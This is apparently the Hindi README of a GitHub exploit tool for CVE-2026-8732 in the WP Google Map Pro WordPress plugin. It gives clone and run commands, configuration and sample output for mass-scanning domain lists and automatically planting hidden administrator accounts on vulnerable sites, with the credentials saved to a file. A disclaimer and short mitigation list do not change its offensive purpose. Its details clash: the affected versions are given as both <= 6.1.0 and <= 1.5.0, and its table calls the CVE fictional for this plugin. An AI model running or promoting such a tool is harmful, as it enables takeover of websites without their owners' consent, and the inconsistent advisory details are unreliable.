
WP Maps Pro <= 6.1.0 - wpgmp_temp_access_ajax AJAX क्रिया में व्यवस्थापक खाता निर्माण के माध्यम से अप्रमाणित विशेषाधिकार वृद्धि
यह टूल CVE-2026-8732 का शोषण करता है, जो WordPress के लिए WP Google Map Pro प्लगइन में एक कमजोरी है। यह कमजोरी एक अनधिकृत हमलावर को AJAX एंडपॉइंट (admin-ajax.php?action=wpgmp_temp_access_ajax) के माध्यम से एक वैध wpmp_token प्राप्त करने की अनुमति देती है। इस टोकन का उपयोग करके, एक हमलावर WordPress एडमिन पैनल तक पहुँच सकता है और एक नया व्यवस्थापक उपयोगकर्ता बना सकता है।
यह टूल डोमेन की सूची से मास स्कैनिंग करता है, नॉन्स और टोकन निकालता है, और कमजोर साइटों पर स्वचालित रूप से एक छिपा हुआ व्यवस्थापक खाता बनाता है। परिणाम पूर्ण टोकन विवरण के साथ रीयल-टाइम में सहेजे जाते हैं।
⚠️ अस्वीकरण: यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है। इसका उपयोग केवल उन सिस्टमों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।
अधिक अस्वीकरण के लिए आप Jenderal92 के कवर पर दिया गया अस्वीकरण देख सकते हैं। आप इसे यहाँ !!! देख सकते हैं।
admin_created.txt में सहेजता हैhttp:// और https:// दोनों का समर्थन करता हैrequests लाइब्रेरीआवश्यक लाइब्रेरी स्थापित करें:
pip install requests
🚀 स्थापना
git clone https://github.com/Jenderal92/CVE-2026-8732.git
cd CVE-2026-8732
🎯 उपयोग
लक्ष्य सूची फ़ाइल तैयार करें (प्रति पंक्ति एक डोमेन):
example.com
https://target-website.com
http://vulnerable-site.org
स्कैनर चलाएँ:
python2 exploit.py targets.txt
आउटपुट फ़ाइलें
फ़ाइल सामग्री res.txt पूर्ण टोकन और रीडायरेक्ट URL (यदि कोई हो) के साथ कमजोर डोमेन admin_created.txt सफलतापूर्वक बनाए गए एडमिन क्रेडेंशियल्स (डोमेन, उपयोगकर्ता नाम, पासवर्ड, ईमेल)
उदाहरण आउटपुट
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
⚙️ कॉन्फ़िगरेशन
स्क्रिप्ट के अंदर निम्नलिखित वेरिएबल्स को संपादित करें:
TIMEOUT = 10 # Request timeout in seconds
JUMLAH_THREAD = 10 # Number of concurrent threads
OUTPUT_FILE = "res.txt" # File for vulnerable results
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
🧠 यह कैसे काम करता है
🛡️ शमन
· WP Google Map Pro को नवीनतम पैच किए गए संस्करण में अपडेट करें। · कस्टम कोड या फ़ायरवॉल के माध्यम से wpgmp_temp_access_ajax AJAX एक्शन को अक्षम करें। · admin-ajax.php पर दुर्भावनापूर्ण अनुरोधों को ब्लॉक करने के लिए वेब एप्लिकेशन फ़ायरवॉल (WAF) का उपयोग करें।
⭐ अस्वीकरण
यह सॉफ़्टवेयर बिना किसी वारंटी के "जैसा है" (AS IS) प्रदान किया जाता है। सॉफ़्टवेयर की गुणवत्ता और प्रदर्शन का पूरा जोखिम आप पर है। जिम्मेदारी से उपयोग करें और केवल उन्हीं सिस्टमों पर करें जिनके परीक्षण के लिए आप अधिकृत हैं।
| फ़ील्ड | मान |
|---|
| CVE ID | CVE-2026-8732 (इस प्लगइन के लिए काल्पनिक) |
| प्रभावित प्लगइन | WP Google Map Pro (संस्करण <= 1.5.0) |
| कमजोरी प्रकार | टूटा हुआ एक्सेस नियंत्रण / विशेषाधिकार वृद्धि |
| हमले का वेक्टर | अनधिकृत, रिमोट |
| प्रभाव | एडमिन खाता निर्माण के माध्यम से पूर्ण साइट अधिग्रहण |